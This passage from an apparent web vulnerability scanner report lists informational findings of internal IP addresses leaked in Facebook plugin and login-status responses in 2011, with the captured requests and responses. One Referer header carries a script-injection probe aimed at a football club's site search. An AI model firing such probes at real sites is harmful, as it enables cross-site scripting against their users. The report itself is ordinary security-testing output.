Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=141597515880090&app_id=141597515880090&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2328241ec%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff34dd476e4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32dd89434%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff34dd476e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfda51478c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df343debe4%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff34dd476e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfda51478c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ff5fda18%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff34dd476e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfda51478c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8aa22a24%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff34dd476e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfda51478c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.152.37
X-Cnection: close
Date: Mon, 03 Oct 2011 00:13:14 GMT
Content-Length: 242

<script type="text/javascript">
parent.postMessage("cb=f2ff5fda18&origin=http\u00253A\u00252F\u00252Fwww.expedia.com\u00252Ff34dd476e4&relation=parent&transport=postmessage&frame=fda51478c", "http:\/\
...[SNIP]...
23.81. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=141597515880090&app_id=141597515880090&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df21414a1d%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff2ef68ea8c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df87e1fe3%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff2ef68ea8c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b615ffc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df249f21b48%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff2ef68ea8c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b615ffc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3d31961a%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff2ef68ea8c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b615ffc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18caaa6c%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff2ef68ea8c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b615ffc&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; lsd=xyVNA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.68.43
X-Cnection: close
Date: Mon, 03 Oct 2011 01:07:07 GMT
Content-Length: 241

<script type="text/javascript">
parent.postMessage("cb=f3d31961a&origin=http\u00253A\u00252F\u00252Fwww.expedia.com\u00252Ff2ef68ea8c&relation=parent&transport=postmessage&frame=f2b615ffc", "http:\/\/
...[SNIP]...
23.82. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=5aaf37e32a30d8d582e69f8ddbfea86b&extern=0&channel=http%3A%2F%2Fwww.igougo.com%2Fxd_receiver.aspx&locale=en_US&sdk=edgar HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.90.57
X-Cnection: close
Date: Mon, 03 Oct 2011 01:53:24 GMT
Content-Length: 1091

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"igougo.com","channel":"http
...[SNIP]...
23.83. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=120836677942069&app_id=120836677942069&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c169940c%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df4f4b2a24%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df89532eac%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df64f7cd6%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df89532eac&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13ca67784%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df89532eac&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18123d9d%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df89532eac&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.136.46
X-Cnection: close
Date: Mon, 03 Oct 2011 00:02:48 GMT
Content-Length: 234

<script type="text/javascript">
parent.postMessage("cb=f13ca67784&origin=http\u00253A\u00252F\u00252Fwww.nike.com\u00252Ff20d909cc&relation=parent&transport=postmessage&frame=f89532eac", "http:\/\/www
...[SNIP]...
23.84. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=50c378d8154db3a16aee8f1a8bb76f49&extern=0&channel=http%3A%2F%2Fhublotnation.com%2F%3Fxd_receiver%3D1&locale=en_US&sdk=edgar HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.64
X-Cnection: close
Date: Mon, 03 Oct 2011 00:02:21 GMT
Content-Length: 1092

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"hublotnation.com","channel"
...[SNIP]...
23.85. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?locale=en_US&href=http://www.agoda.com&layout=standard&show_faces=False&action=like&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.92.119
X-Cnection: close
Date: Mon, 03 Oct 2011 00:39:04 GMT
Content-Length: 25700

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.86. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Ftravelocity&send=false&layout=button_count&width=50&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.199.63
X-Cnection: close
Date: Mon, 03 Oct 2011 00:08:06 GMT
Content-Length: 23289

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.87. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2bbdf08e%26origin%3Dhttp%253A%252F%252Fwww.hotelplanner.com%252Ff33e26caf4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=www.facebook.com%2Fhotelplanner&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.190.61
X-Cnection: close
Date: Mon, 03 Oct 2011 00:11:02 GMT
Content-Length: 31012

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.88. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df133b4b3cc%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff115b08374%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.227.49
X-Cnection: close
Date: Mon, 03 Oct 2011 00:10:27 GMT
Content-Length: 26104

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.89. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fhotelplanner&layout=button_count&show_faces=false&width=46&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.188.41
X-Cnection: close
Date: Mon, 03 Oct 2011 00:28:34 GMT
Content-Length: 23446

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.90. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.200.64
X-Cnection: close
Date: Mon, 03 Oct 2011 00:26:45 GMT
Content-Length: 23287

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.91. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a5122968%26origin%3Dhttp%253A%252F%252Fwww.hotelplanner.com%252Ff188f86a78%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=www.facebook.com%2Fhotelplanner&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=+&InDate=10/09/2011&OutDate=10/16/2011&NumRooms=1&sc=Away
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.94.107
X-Cnection: close
Date: Mon, 03 Oct 2011 00:37:45 GMT
Content-Length: 30957

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.92. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=158327657537972&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc165e08c%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=160 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.197.35
X-Cnection: close
Date: Mon, 03 Oct 2011 00:29:28 GMT
Content-Length: 31301

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.93. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ba4bfa1%26origin%3Dhttp%253A%252F%252Fwww.hotelplanner.com%252Ff2fa01307%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=www.facebook.com%2Fhotelplanner&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
